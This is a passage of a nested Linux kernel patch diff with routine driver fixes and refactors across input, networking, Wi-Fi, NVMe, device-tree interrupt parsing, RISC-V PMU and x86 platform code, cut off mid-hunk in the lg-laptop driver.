+ 			i8042_reset = I8042_RESET_NEVER;
+ 	}
+-	if (quirks & SERIO_QUIRK_DIECT)
++	if (quirks & SERIO_QUIRK_DIRECT)
+ 		i8042_direct = true;
+ 	if (quirks & SERIO_QUIRK_DUMBKBD)
+ 		i8042_dumbkbd = true;
+diff --git a/drivers/input/touchscreen/silead.c b/drivers/input/touchscreen/silead.c
+index 3eef8c01090fd..30e15b6a93574 100644
+--- a/drivers/input/touchscreen/silead.c
++++ b/drivers/input/touchscreen/silead.c
+@@ -71,7 +71,6 @@ struct silead_ts_data {
+ 	struct regulator_bulk_data regulators[2];
+ 	char fw_name[64];
+ 	struct touchscreen_properties prop;
+-	u32 max_fingers;
+ 	u32 chip_id;
+ 	struct input_mt_pos pos[SILEAD_MAX_FINGERS];
+ 	int slots[SILEAD_MAX_FINGERS];
+@@ -136,7 +135,7 @@ static int silead_ts_request_input_dev(struct silead_ts_data *data)
+ 	touchscreen_parse_properties(data->input, true, &data->prop);
+ 	silead_apply_efi_fw_min_max(data);
+ 
+-	input_mt_init_slots(data->input, data->max_fingers,
++	input_mt_init_slots(data->input, SILEAD_MAX_FINGERS,
+ 			    INPUT_MT_DIRECT | INPUT_MT_DROP_UNUSED |
+ 			    INPUT_MT_TRACK);
+ 
+@@ -256,10 +255,10 @@ static void silead_ts_read_data(struct i2c_client *client)
+ 		return;
+ 	}
+ 
+-	if (buf[0] > data->max_fingers) {
++	if (buf[0] > SILEAD_MAX_FINGERS) {
+ 		dev_warn(dev, "More touches reported then supported %d > %d\n",
+-			 buf[0], data->max_fingers);
+-		buf[0] = data->max_fingers;
++			 buf[0], SILEAD_MAX_FINGERS);
++		buf[0] = SILEAD_MAX_FINGERS;
+ 	}
+ 
+ 	if (silead_ts_handle_pen_data(data, buf))
+@@ -315,7 +314,6 @@ static void silead_ts_read_data(struct i2c_client *client)
+ 
+ static int silead_ts_init(struct i2c_client *client)
+ {
+-	struct silead_ts_data *data = i2c_get_clientdata(client);
+ 	int error;
+ 
+ 	error = i2c_smbus_write_byte_data(client, SILEAD_REG_RESET,
+@@ -325,7 +323,7 @@ static int silead_ts_init(struct i2c_client *client)
+ 	usleep_range(SILEAD_CMD_SLEEP_MIN, SILEAD_CMD_SLEEP_MAX);
+ 
+ 	error = i2c_smbus_write_byte_data(client, SILEAD_REG_TOUCH_NR,
+-					data->max_fingers);
++					  SILEAD_MAX_FINGERS);
+ 	if (error)
+ 		goto i2c_write_err;
+ 	usleep_range(SILEAD_CMD_SLEEP_MIN, SILEAD_CMD_SLEEP_MAX);
+@@ -591,13 +589,6 @@ static void silead_ts_read_props(struct i2c_client *client)
+ 	const char *str;
+ 	int error;
+ 
+-	error = device_property_read_u32(dev, "silead,max-fingers",
+-					 &data->max_fingers);
+-	if (error) {
+-		dev_dbg(dev, "Max fingers read error %d\n", error);
+-		data->max_fingers = 5; /* Most devices handle up-to 5 fingers */
+-	}
+-
+ 	error = device_property_read_string(dev, "firmware-name", &str);
+ 	if (!error)
+ 		snprintf(data->fw_name, sizeof(data->fw_name),
+diff --git a/drivers/misc/mei/main.c b/drivers/misc/mei/main.c
+index 930887e7e38d6..615fafb0366a8 100644
+--- a/drivers/misc/mei/main.c
++++ b/drivers/misc/mei/main.c
+@@ -327,7 +327,7 @@ static ssize_t mei_write(struct file *file, const char __user *ubuf,
+ 	}
+ 
+ 	if (!mei_cl_is_connected(cl)) {
+-		cl_err(dev, cl, "is not connected");
++		cl_dbg(dev, cl, "is not connected");
+ 		rets = -ENODEV;
+ 		goto out;
+ 	}
+diff --git a/drivers/net/can/usb/kvaser_usb/kvaser_usb_core.c b/drivers/net/can/usb/kvaser_usb/kvaser_usb_core.c
+index 5136d1e161181..65dd57247c62e 100644
+--- a/drivers/net/can/usb/kvaser_usb/kvaser_usb_core.c
++++ b/drivers/net/can/usb/kvaser_usb/kvaser_usb_core.c
+@@ -292,7 +292,7 @@ int kvaser_usb_send_cmd_async(struct kvaser_usb_net_priv *priv, void *cmd,
+ 	}
+ 	usb_free_urb(urb);
+ 
+-	return 0;
++	return err;
+ }
+ 
+ int kvaser_usb_can_rx_over_error(struct net_device *netdev)
+diff --git a/drivers/net/ethernet/ibm/ibmvnic.c b/drivers/net/ethernet/ibm/ibmvnic.c
+index 8f377d0a80fe6..6d17738c1c536 100644
+--- a/drivers/net/ethernet/ibm/ibmvnic.c
++++ b/drivers/net/ethernet/ibm/ibmvnic.c
+@@ -2288,6 +2288,18 @@ static netdev_tx_t ibmvnic_xmit(struct sk_buff *skb, struct net_device *netdev)
+ 	    (tx_pool->consumer_index + 1) % tx_pool->num_buffers;
+ 
+ 	tx_buff = &tx_pool->tx_buff[bufidx];
++
++	/* Sanity checks on our free map to make sure it points to an index
++	 * that is not being occupied by another skb. If skb memory is
++	 * not freed then we see congestion control kick in and halt tx.
++	 */
++	if (unlikely(tx_buff->skb)) {
++		dev_warn_ratelimited(dev, "TX free map points to untracked skb (%s %d idx=%d)\n",
++				     skb_is_gso(skb) ? "tso_pool" : "tx_pool",
++				     queue_num, bufidx);
++		dev_kfree_skb_any(tx_buff->skb);
++	}
++
+ 	tx_buff->skb = skb;
+ 	tx_buff->index = bufidx;
+ 	tx_buff->pool_index = queue_num;
+diff --git a/drivers/net/usb/qmi_wwan.c b/drivers/net/usb/qmi_wwan.c
+index d22ba63160b8d..46e0e1f1c20e0 100644
+--- a/drivers/net/usb/qmi_wwan.c
++++ b/drivers/net/usb/qmi_wwan.c
+@@ -1379,6 +1379,8 @@ static const struct usb_device_id products[] = {
+ 	{QMI_QUIRK_SET_DTR(0x1bc7, 0x1260, 2)},	/* Telit LE910Cx */
+ 	{QMI_QUIRK_SET_DTR(0x1bc7, 0x1261, 2)},	/* Telit LE910Cx */
+ 	{QMI_QUIRK_SET_DTR(0x1bc7, 0x1900, 1)},	/* Telit LN940 series */
++	{QMI_QUIRK_SET_DTR(0x1bc7, 0x3000, 0)},	/* Telit FN912 series */
++	{QMI_QUIRK_SET_DTR(0x1bc7, 0x3001, 0)},	/* Telit FN912 series */
+ 	{QMI_FIXED_INTF(0x1c9e, 0x9801, 3)},	/* Telewell TW-3G HSPA+ */
+ 	{QMI_FIXED_INTF(0x1c9e, 0x9803, 4)},	/* Telewell TW-3G HSPA+ */
+ 	{QMI_FIXED_INTF(0x1c9e, 0x9b01, 3)},	/* XS Stick W100-2 from 4G Systems */
+diff --git a/drivers/net/wireless/intel/iwlwifi/mvm/d3.c b/drivers/net/wireless/intel/iwlwifi/mvm/d3.c
+index 88f4f429d875c..425588605a262 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mvm/d3.c
++++ b/drivers/net/wireless/intel/iwlwifi/mvm/d3.c
+@@ -594,16 +594,25 @@ static void iwl_mvm_wowlan_gtk_type_iter(struct ieee80211_hw *hw,
+ 					 void *_data)
+ {
+ 	struct wowlan_key_gtk_type_iter *data = _data;
++	__le32 *cipher = NULL;
++
++	if (key->keyidx == 4 || key->keyidx == 5)
++		cipher = &data->kek_kck_cmd->igtk_cipher;
++	if (key->keyidx == 6 || key->keyidx == 7)
++		cipher = &data->kek_kck_cmd->bigtk_cipher;
+ 
+ 	switch (key->cipher) {
+ 	default:
+ 		return;
+ 	case WLAN_CIPHER_SUITE_BIP_GMAC_256:
+ 	case WLAN_CIPHER_SUITE_BIP_GMAC_128:
+-		data->kek_kck_cmd->igtk_cipher = cpu_to_le32(STA_KEY_FLG_GCMP);
++		if (cipher)
++			*cipher = cpu_to_le32(STA_KEY_FLG_GCMP);
+ 		return;
+ 	case WLAN_CIPHER_SUITE_AES_CMAC:
+-		data->kek_kck_cmd->igtk_cipher = cpu_to_le32(STA_KEY_FLG_CCM);
++	case WLAN_CIPHER_SUITE_BIP_CMAC_256:
++		if (cipher)
++			*cipher = cpu_to_le32(STA_KEY_FLG_CCM);
+ 		return;
+ 	case WLAN_CIPHER_SUITE_CCMP:
+ 		if (!sta)
+@@ -1934,7 +1943,8 @@ static bool iwl_mvm_setup_connection_keep(struct iwl_mvm *mvm,
+ 
+ out:
+ 	if (iwl_fw_lookup_notif_ver(mvm->fw, LONG_GROUP,
+-				    WOWLAN_GET_STATUSES, 0) < 10) {
++				    WOWLAN_GET_STATUSES,
++				    IWL_FW_CMD_VER_UNKNOWN) < 10) {
+ 		mvmvif->seqno_valid = true;
+ 		/* +0x10 because the set API expects next-to-use, not last-used */
+ 		mvmvif->seqno = status->non_qos_seq_ctr + 0x10;
+diff --git a/drivers/net/wireless/intel/iwlwifi/mvm/mac80211.c b/drivers/net/wireless/intel/iwlwifi/mvm/mac80211.c
+index 801098c5183b6..4e8bdd3d701bf 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mvm/mac80211.c
++++ b/drivers/net/wireless/intel/iwlwifi/mvm/mac80211.c
+@@ -532,7 +532,7 @@ int iwl_mvm_mac_setup_register(struct iwl_mvm *mvm)
+ 		hw->wiphy->features |= NL80211_FEATURE_WFA_TPC_IE_IN_PROBES;
+ 
+ 	if (iwl_fw_lookup_cmd_ver(mvm->fw, WOWLAN_KEK_KCK_MATERIAL,
+-				  IWL_FW_CMD_VER_UNKNOWN) == 3)
++				  IWL_FW_CMD_VER_UNKNOWN) >= 3)
+ 		hw->wiphy->flags |= WIPHY_FLAG_SUPPORTS_EXT_KEK_KCK;
+ 
+ 	if (fw_has_api(&mvm->fw->ucode_capa,
+diff --git a/drivers/net/wireless/intel/iwlwifi/mvm/scan.c b/drivers/net/wireless/intel/iwlwifi/mvm/scan.c
+index a7a29f1659ea6..069bac72117fe 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mvm/scan.c
++++ b/drivers/net/wireless/intel/iwlwifi/mvm/scan.c
+@@ -1707,7 +1707,10 @@ iwl_mvm_umac_scan_fill_6g_chan_list(struct iwl_mvm *mvm,
+ 				break;
+ 		}
+ 
+-		if (k == idex_b && idex_b < SCAN_BSSID_MAX_SIZE) {
++		if (k == idex_b && idex_b < SCAN_BSSID_MAX_SIZE &&
++		    !WARN_ONCE(!is_valid_ether_addr(scan_6ghz_params[j].bssid),
++			       "scan: invalid BSSID at index %u, index_b=%u\n",
++			       j, idex_b)) {
+ 			memcpy(&pp->bssid_array[idex_b++],
+ 			       scan_6ghz_params[j].bssid, ETH_ALEN);
+ 		}
+@@ -3054,10 +3057,11 @@ static int iwl_mvm_umac_scan_abort(struct iwl_mvm *mvm, int type)
+ 
+ 	ret = iwl_mvm_send_cmd_pdu(mvm,
+ 				   WIDE_ID(IWL_ALWAYS_LONG_GROUP, SCAN_ABORT_UMAC),
+-				   0, sizeof(cmd), &cmd);
++				   CMD_SEND_IN_RFKILL, sizeof(cmd), &cmd);
+ 	if (!ret)
+ 		mvm->scan_uid_status[uid] = type << IWL_MVM_SCAN_STOPPING_SHIFT;
+ 
++	IWL_DEBUG_SCAN(mvm, "Scan abort: ret=%d\n", ret);
+ 	return ret;
+ }
+ 
+diff --git a/drivers/nvme/host/core.c b/drivers/nvme/host/core.c
+index 75b4dd8a55b03..1aff793a1d77e 100644
+--- a/drivers/nvme/host/core.c
++++ b/drivers/nvme/host/core.c
+@@ -954,6 +954,7 @@ void nvme_cleanup_cmd(struct request *req)
+ 			clear_bit_unlock(0, &ctrl->discard_page_busy);
+ 		else
+ 			kfree(bvec_virt(&req->special_vec));
++		req->rq_flags &= ~RQF_SPECIAL_PAYLOAD;
+ 	}
+ }
+ EXPORT_SYMBOL_GPL(nvme_cleanup_cmd);
+diff --git a/drivers/nvme/target/core.c b/drivers/nvme/target/core.c
+index d2954406b2297..a68e7b1606da5 100644
+--- a/drivers/nvme/target/core.c
++++ b/drivers/nvme/target/core.c
+@@ -944,6 +944,7 @@ bool nvmet_req_init(struct nvmet_req *req, struct nvmet_cq *cq,
+ 	req->metadata_sg_cnt = 0;
+ 	req->transfer_len = 0;
+ 	req->metadata_len = 0;
++	req->cqe->result.u64 = 0;
+ 	req->cqe->status = 0;
+ 	req->cqe->sq_head = 0;
+ 	req->ns = NULL;
+diff --git a/drivers/nvme/target/fabrics-cmd-auth.c b/drivers/nvme/target/fabrics-cmd-auth.c
+index fbae76cdc2546..e0dc22fea086d 100644
+--- a/drivers/nvme/target/fabrics-cmd-auth.c
++++ b/drivers/nvme/target/fabrics-cmd-auth.c
+@@ -336,7 +336,6 @@ void nvmet_execute_auth_send(struct nvmet_req *req)
+ 		pr_debug("%s: ctrl %d qid %d nvme status %x error loc %d\n",
+ 			 __func__, ctrl->cntlid, req->sq->qid,
+ 			 status, req->error_loc);
+-	req->cqe->result.u64 = 0;
+ 	if (req->sq->dhchap_step != NVME_AUTH_DHCHAP_MESSAGE_SUCCESS2 &&
+ 	    req->sq->dhchap_step != NVME_AUTH_DHCHAP_MESSAGE_FAILURE2) {
+ 		unsigned long auth_expire_secs = ctrl->kato ? ctrl->kato : 120;
+@@ -528,8 +527,6 @@ void nvmet_execute_auth_receive(struct nvmet_req *req)
+ 	status = nvmet_copy_to_sgl(req, 0, d, al);
+ 	kfree(d);
+ done:
+-	req->cqe->result.u64 = 0;
+-
+ 	if (req->sq->dhchap_step == NVME_AUTH_DHCHAP_MESSAGE_SUCCESS2)
+ 		nvmet_auth_sq_free(req->sq);
+ 	else if (req->sq->dhchap_step == NVME_AUTH_DHCHAP_MESSAGE_FAILURE1) {
+diff --git a/drivers/nvme/target/fabrics-cmd.c b/drivers/nvme/target/fabrics-cmd.c
+index d8da840a1c0ed..fa9e8dc921539 100644
+--- a/drivers/nvme/target/fabrics-cmd.c
++++ b/drivers/nvme/target/fabrics-cmd.c
+@@ -225,9 +225,6 @@ static void nvmet_execute_admin_connect(struct nvmet_req *req)
+ 	if (status)
+ 		goto out;
+ 
+-	/* zero out initial completion result, assign values as needed */
+-	req->cqe->result.u32 = 0;
+-
+ 	if (c->recfmt != 0) {
+ 		pr_warn("invalid connect version (%d).\n",
+ 			le16_to_cpu(c->recfmt));
+@@ -305,9 +302,6 @@ static void nvmet_execute_io_connect(struct nvmet_req *req)
+ 	if (status)
+ 		goto out;
+ 
+-	/* zero out initial completion result, assign values as needed */
+-	req->cqe->result.u32 = 0;
+-
+ 	if (c->recfmt != 0) {
+ 		pr_warn("invalid connect version (%d).\n",
+ 			le16_to_cpu(c->recfmt));
+diff --git a/drivers/of/irq.c b/drivers/of/irq.c
+index 2bac44f09554b..88c24d88c4b92 100644
+--- a/drivers/of/irq.c
++++ b/drivers/of/irq.c
+@@ -25,6 +25,8 @@
+ #include <linux/string.h>
+ #include <linux/slab.h>
+ 
++#include "of_private.h"
++
+ /**
+  * irq_of_parse_and_map - Parse and map an interrupt into linux virq space
+  * @dev: Device node of the device whose interrupt is to be mapped
+@@ -79,7 +81,8 @@ EXPORT_SYMBOL_GPL(of_irq_find_parent);
+ /*
+  * These interrupt controllers abuse interrupt-map for unspeakable
+  * reasons and rely on the core code to *ignore* it (the drivers do
+- * their own parsing of the property).
++ * their own parsing of the property). The PAsemi entry covers a
++ * non-sensical interrupt-map that is better left ignored.
+  *
+  * If you think of adding to the list for something *new*, think
+  * again. There is a high chance that you will be sent back to the
+@@ -93,9 +96,61 @@ static const char * const of_irq_imap_abusers[] = {
+ 	"fsl,ls1043a-extirq",
+ 	"fsl,ls1088a-extirq",
+ 	"renesas,rza1-irqc",
++	"pasemi,rootbus",
+ 	NULL,
+ };
+ 
++const __be32 *of_irq_parse_imap_parent(const __be32 *imap, int len, struct of_phandle_args *out_irq)
++{
++	u32 intsize, addrsize;
++	struct device_node *np;
++
++	/* Get the interrupt parent */
++	if (of_irq_workarounds & OF_IMAP_NO_PHANDLE)
++		np = of_node_get(of_irq_dflt_pic);
++	else
++		np = of_find_node_by_phandle(be32_to_cpup(imap));
++	imap++;
++
++	/* Check if not found */
++	if (!np) {
++		pr_debug(" -> imap parent not found !\n");
++		return NULL;
++	}
++
++	/* Get #interrupt-cells and #address-cells of new parent */
++	if (of_property_read_u32(np, "#interrupt-cells",
++					&intsize)) {
++		pr_debug(" -> parent lacks #interrupt-cells!\n");
++		of_node_put(np);
++		return NULL;
++	}
++	if (of_property_read_u32(np, "#address-cells",
++					&addrsize))
++		addrsize = 0;
++
++	pr_debug(" -> intsize=%d, addrsize=%d\n",
++		intsize, addrsize);
++
++	/* Check for malformed properties */
++	if (WARN_ON(addrsize + intsize > MAX_PHANDLE_ARGS)
++		|| (len < (addrsize + intsize))) {
++		of_node_put(np);
++		return NULL;
++	}
++
++	pr_debug(" -> imaplen=%d\n", len);
++
++	imap += addrsize + intsize;
++
++	out_irq->np = np;
++	for (int i = 0; i < intsize; i++)
++		out_irq->args[i] = be32_to_cpup(imap - intsize + i);
++	out_irq->args_count = intsize;
++
++	return imap;
++}
++
+ /**
+  * of_irq_parse_raw - Low level interrupt tree parsing
+  * @addr:	address specifier (start of "reg" property of the device) in be32 format
+@@ -112,12 +167,12 @@ static const char * const of_irq_imap_abusers[] = {
+  */
+ int of_irq_parse_raw(const __be32 *addr, struct of_phandle_args *out_irq)
+ {
+-	struct device_node *ipar, *tnode, *old = NULL, *newpar = NULL;
++	struct device_node *ipar, *tnode, *old = NULL;
+ 	__be32 initial_match_array[MAX_PHANDLE_ARGS];
+ 	const __be32 *match_array = initial_match_array;
+-	const __be32 *tmp, *imap, *imask, dummy_imask[] = { [0 ... MAX_PHANDLE_ARGS] = cpu_to_be32(~0) };
+-	u32 intsize = 1, addrsize, newintsize = 0, newaddrsize = 0;
+-	int imaplen, match, i, rc = -EINVAL;
++	const __be32 *tmp, dummy_imask[] = { [0 ... MAX_PHANDLE_ARGS] = cpu_to_be32(~0) };
++	u32 intsize = 1, addrsize;
++	int i, rc = -EINVAL;
+ 
+ #ifdef DEBUG
+ 	of_print_phandle_args("of_irq_parse_raw: ", out_irq);
+@@ -176,6 +231,9 @@ int of_irq_parse_raw(const __be32 *addr, struct of_phandle_args *out_irq)
+ 
+ 	/* Now start the actual "proper" walk of the interrupt tree */
+ 	while (ipar != NULL) {
++		int imaplen, match;
++		const __be32 *imap, *oldimap, *imask;
++		struct device_node *newpar;
+ 		/*
+ 		 * Now check if cursor is an interrupt-controller and
+ 		 * if it is then we are done, unless there is an
+@@ -216,7 +274,7 @@ int of_irq_parse_raw(const __be32 *addr, struct of_phandle_args *out_irq)
+ 
+ 		/* Parse interrupt-map */
+ 		match = 0;
+-		while (imaplen > (addrsize + intsize + 1) && !match) {
++		while (imaplen > (addrsize + intsize + 1)) {
+ 			/* Compare specifiers */
+ 			match = 1;
+ 			for (i = 0; i < (addrsize + intsize); i++, imaplen--)
+@@ -224,74 +282,31 @@ int of_irq_parse_raw(const __be32 *addr, struct of_phandle_args *out_irq)
+ 
+ 			pr_debug(" -> match=%d (imaplen=%d)\n", match, imaplen);
+ 
+-			/* Get the interrupt parent */
+-			if (of_irq_workarounds & OF_IMAP_NO_PHANDLE)
+-				newpar = of_node_get(of_irq_dflt_pic);
+-			else
+-				newpar = of_find_node_by_phandle(be32_to_cpup(imap));
+-			imap++;
+-			--imaplen;
+-
+-			/* Check if not found */
+-			if (newpar == NULL) {
+-				pr_debug(" -> imap parent not found !\n");
++			oldimap = imap;
++			imap = of_irq_parse_imap_parent(oldimap, imaplen, out_irq);
++			if (!imap)
+ 				goto fail;
+-			}
+-
+-			if (!of_device_is_available(newpar))
+-				match = 0;
+-
+-			/* Get #interrupt-cells and #address-cells of new
+-			 * parent
+-			 */
+-			if (of_property_read_u32(newpar, "#interrupt-cells",
+-						 &newintsize)) {
+-				pr_debug(" -> parent lacks #interrupt-cells!\n");
+-				goto fail;
+-			}
+-			if (of_property_read_u32(newpar, "#address-cells",
+-						 &newaddrsize))
+-				newaddrsize = 0;
+ 
+-			pr_debug(" -> newintsize=%d, newaddrsize=%d\n",
+-			    newintsize, newaddrsize);
+-
+-			/* Check for malformed properties */
+-			if (WARN_ON(newaddrsize + newintsize > MAX_PHANDLE_ARGS)
+-			    || (imaplen < (newaddrsize + newintsize))) {
+-				rc = -EFAULT;
+-				goto fail;
+-			}
+-
+-			imap += newaddrsize + newintsize;
+-			imaplen -= newaddrsize + newintsize;
++			match &= of_device_is_available(out_irq->np);
++			if (match)
++				break;
+ 
++			of_node_put(out_irq->np);
++			imaplen -= imap - oldimap;
+ 			pr_debug(" -> imaplen=%d\n", imaplen);
+ 		}
+-		if (!match) {
+-			if (intc) {
+-				/*
+-				 * The PASEMI Nemo is a known offender, so
+-				 * let's only warn for anyone else.
+-				 */
+-				WARN(!IS_ENABLED(CONFIG_PPC_PASEMI),
+-				     "%pOF interrupt-map failed, using interrupt-controller\n",
+-				     ipar);
+-				return 0;
+-			}
+-
++		if (!match)
+ 			goto fail;
+-		}
+ 
+ 		/*
+ 		 * Successfully parsed an interrupt-map translation; copy new
+ 		 * interrupt specifier into the out_irq structure
+ 		 */
+-		match_array = imap - newaddrsize - newintsize;
+-		for (i = 0; i < newintsize; i++)
+-			out_irq->args[i] = be32_to_cpup(imap - newintsize + i);
+-		out_irq->args_count = intsize = newintsize;
+-		addrsize = newaddrsize;
++		match_array = oldimap + 1;
++
++		newpar = out_irq->np;
++		intsize = out_irq->args_count;
++		addrsize = (imap - match_array) - intsize;
+ 
+ 		if (ipar == newpar) {
+ 			pr_debug("%pOF interrupt-map entry to self\n", ipar);
+@@ -300,7 +315,6 @@ int of_irq_parse_raw(const __be32 *addr, struct of_phandle_args *out_irq)
+ 
+ 	skiplevel:
+ 		/* Iterate again with new parent */
+-		out_irq->np = newpar;
+ 		pr_debug(" -> new parent: %pOF\n", newpar);
+ 		of_node_put(ipar);
+ 		ipar = newpar;
+@@ -310,7 +324,6 @@ int of_irq_parse_raw(const __be32 *addr, struct of_phandle_args *out_irq)
+ 
+  fail:
+ 	of_node_put(ipar);
+-	of_node_put(newpar);
+ 
+ 	return rc;
+ }
+diff --git a/drivers/of/of_private.h b/drivers/of/of_private.h
+index fb6792d381a6b..ee09d7141bcf8 100644
+--- a/drivers/of/of_private.h
++++ b/drivers/of/of_private.h
+@@ -151,6 +151,9 @@ extern void __of_sysfs_remove_bin_file(struct device_node *np,
+ extern int of_bus_n_addr_cells(struct device_node *np);
+ extern int of_bus_n_size_cells(struct device_node *np);
+ 
++const __be32 *of_irq_parse_imap_parent(const __be32 *imap, int len,
++				       struct of_phandle_args *out_irq);
++
+ struct bus_dma_region;
+ #if defined(CONFIG_OF_ADDRESS) && defined(CONFIG_HAS_DMA)
+ int of_dma_get_range(struct device_node *np,
+diff --git a/drivers/perf/riscv_pmu_sbi.c b/drivers/perf/riscv_pmu_sbi.c
+index 382fe5ee6100b..5aab43a3ffb92 100644
+--- a/drivers/perf/riscv_pmu_sbi.c
++++ b/drivers/perf/riscv_pmu_sbi.c
+@@ -502,7 +502,7 @@ static inline void pmu_sbi_stop_all(struct riscv_pmu *pmu)
+ 	 * which may include counters that are not enabled yet.
+ 	 */
+ 	sbi_ecall(SBI_EXT_PMU, SBI_EXT_PMU_COUNTER_STOP,
+-		  0, pmu->cmask, 0, 0, 0, 0);
++		  0, pmu->cmask, SBI_PMU_STOP_FLAG_RESET, 0, 0, 0);
+ }
+ 
+ static inline void pmu_sbi_stop_hw_ctrs(struct riscv_pmu *pmu)
+diff --git a/drivers/platform/mellanox/nvsw-sn2201.c b/drivers/platform/mellanox/nvsw-sn2201.c
+index 7b9c107c17ce6..f53baf7e78e74 100644
+--- a/drivers/platform/mellanox/nvsw-sn2201.c
++++ b/drivers/platform/mellanox/nvsw-sn2201.c
+@@ -1194,6 +1194,7 @@ static int nvsw_sn2201_config_pre_init(struct nvsw_sn2201 *nvsw_sn2201)
+ static int nvsw_sn2201_probe(struct platform_device *pdev)
+ {
+ 	struct nvsw_sn2201 *nvsw_sn2201;
++	int ret;
+ 
+ 	nvsw_sn2201 = devm_kzalloc(&pdev->dev, sizeof(*nvsw_sn2201), GFP_KERNEL);
+ 	if (!nvsw_sn2201)
+@@ -1201,8 +1202,10 @@ static int nvsw_sn2201_probe(struct platform_device *pdev)
+ 
+ 	nvsw_sn2201->dev = &pdev->dev;
+ 	platform_set_drvdata(pdev, nvsw_sn2201);
+-	platform_device_add_resources(pdev, nvsw_sn2201_lpc_io_resources,
++	ret = platform_device_add_resources(pdev, nvsw_sn2201_lpc_io_resources,
+ 				      ARRAY_SIZE(nvsw_sn2201_lpc_io_resources));
++	if (ret)
++		return ret;
+ 
+ 	nvsw_sn2201->main_mux_deferred_nr = NVSW_SN2201_MAIN_MUX_DEFER_NR;
+ 	nvsw_sn2201->main_mux_devs = nvsw_sn2201_main_mux_brdinfo;
+diff --git a/drivers/platform/x86/lg-laptop.c b/drivers/platform/x86/lg-laptop.c
+index 332868b140ed5..2e1dc91bfc764 100644
+--- a/drivers/platform/x86/lg-laptop.c
++++ b/drivers/platform/x86/lg-laptop.c
+@@ -39,8 +39,6 @@ MODULE_LICENSE("GPL");
+ #define WMI_METHOD_WMBB "2B4F501A-BD3C-4394-8DCF-00A7D2BC8210"
+ #define WMI_EVENT_GUID  WMI_EVENT_GUID0
+ 
+-#define WMAB_METHOD     "\\XINI.WMAB"
+-#define WMBB_METHOD     "\\XINI.WMBB"
+ #define SB_GGOV_METHOD  "\\_SB.GGOV"
+ #define GOV_TLED        0x2020008
+ #define WM_GET          1
+@@ -74,7 +72,7 @@ static u32 inited;
+ 
+ static int battery_limit_use_wmbb;
+ static struct led_classdev kbd_backlight;
+-static enum led_brightness get_kbd_backlight_level(void);
++static enum led_brightness get_kbd_backlight_level(struct device *dev);
+ 
+ static const struct key_entry wmi_keymap[] = {
+ 	{KE_KEY, 0x70, {KEY_F15} },	 /* LG control panel (F1) */
+@@ -84,7 +82,6 @@ static const struct key_entry wmi_keymap[] = {
+ 					  * this key both sends an event and
+ 					  * changes backlight level.
+ 					  */
+-	{KE_KEY, 0x80, {KEY_RFKILL} },
+ 	{KE_END, 0}
+ };
+ 
+@@ -128,11 +125,10 @@ static int ggov(u32 arg0)
+ 	return res;
+ }
+ 
+-static union acpi_object *lg_wmab(u32 method, u32 arg1, u32 arg2)
++static union acpi_object *lg_wmab(struct device *dev, u32 method, u32 arg1, u32 arg2)
+ {
+ 	union acpi_object args[3];
+ 	acpi_status status;
+-	acpi_handle handle;
+ 	struct acpi_object_list arg;
+ 	struct acpi_buffer buffer = { ACPI_ALLOCATE_BUFFER, NULL };
+ 
+@@ -143,29 +139,22 @@ static union acpi_object *lg_wmab(u32 method, u32 arg1, u32 arg2)
+ 	args[2].type = ACPI_TYPE_INTEGER;
+ 	args[2].integer.value = arg2;
+ 
+-	status = acpi_get_handle(NULL, (acpi_string) WMAB_METHOD, &handle);
+-	if (ACPI_FAILURE(status)) {
+-		pr_err("Cannot get handle");
+-		return NULL;
+-	}
+-
+ 	arg.count = 3;
+ 	arg.pointer = args;
+ 
+-	status = acpi_evaluate_object(handle, NULL, &arg, &buffer);
++	status = acpi_evaluate_object(ACPI_HANDLE(dev), "WMAB", &arg, &buffer);
+ 	if (ACPI_FAILURE(status)) {
+-		acpi_handle_err(handle, "WMAB: call failed.\n");
++		dev_err(dev, "WMAB: call failed.\n");
+ 		return NULL;
+ 	}
+ 
+ 	return buffer.pointer;
+ }
+ 
+-static union acpi_object *lg_wmbb(u32 method_id, u32 arg1, u32 arg2)
++static union acpi_object *lg_wmbb(struct device *dev, u32 method_id, u32 arg1, u32 arg2)
+ {
+ 	union acpi_object args[3];
+ 	acpi_status status;
+-	acpi_handle handle;
+ 	struct acpi_object_list arg;
+ 	struct acpi_buffer buffer = { ACPI_ALLOCATE_BUFFER, NULL };
+ 	u8 buf[32];
+@@ -181,18 +170,12 @@ static union acpi_object *lg_wmbb(u32 method_id, u32 arg1, u32 arg2)
+ 	args[2].buffer.length = 32;
+ 	args[2].buffer.pointer = buf;
+ 
+-	status = acpi_get_handle(NULL, (acpi_string)WMBB_METHOD, &handle);
+-	if (ACPI_FAILURE(status)) {
+-		pr_err("Cannot get handle");
+-		return NULL;
+-	}
+-
+ 	arg.count = 3;
+ 	arg.pointer = args;
+ 
+-	status = acpi_evaluate_object(handle, NULL, &arg, &buffer);
++	status = acpi_evaluate_object(ACPI_HANDLE(dev), "WMBB", &arg, &buffer);
+ 	if (ACPI_FAILURE(status)) {
+-		acpi_handle_err(handle, "WMAB: call failed.\n");
++		dev_err(dev, "WMBB: call failed.\n");
+ 		return NULL;
+ 	}
+ 
+@@ -223,7 +206,7 @@ static void wmi_notify(u32 value, void *context)
+ 
+ 		if (eventcode == 0x10000000) {
+ 			led_classdev_notify_brightness_hw_changed(
+-				&kbd_backlight, get_kbd_backlight_level());
++				&kbd_backlight, get_kbd_backlight_level(kbd_backlight.dev->parent));
+ 		} else {
+ 			key = sparse_keymap_entry_from_scancode(
+ 				wmi_input_dev, eventcode);
+@@ -272,14 +255,7 @@ static void wmi_input_setup(void)
+ 
+ static void acpi_notify(struct acpi_device *device, u32 event)
+ {
+-	struct key_entry *key;
+-
+ 	acpi_handle_debug(device->handle, "notify: %d\n", event);
+-	if (inited & INIT_SPARSE_KEYMAP) {
+-		key = sparse_keymap_entry_from_scancode(wmi_input_dev, 0x80);
+-		if (key && key->type == KE_KEY)
+-			sparse_keymap_report_entry(wmi_input_dev, key, 1, true);
+-	}
+ }
+ 
+ static ssize_t fan_mode_store(struct device *dev,
+@@ -295,7 +271,7 @@ static ssize_t fan_mode_store(struct device *dev,
+ 	if (ret)
+ 		return ret;
+ 
+-	r = lg_wmab(WM_FAN_MODE, WM_GET, 0);
++	r = lg_wmab(dev, WM_FAN_MODE, WM_GET, 0);
+ 	if (!r)
+ 		return -EIO;
+ 
+@@ -306,9 +282,9 @@ static ssize_t fan_mode_store(struct device *dev,
+ 
+ 	m = r->integer.value;
+ 	kfree(r);
+-	r = lg_wmab(WM_FAN_MODE, WM_SET, (m & 0xffffff0f) | (value << 4));
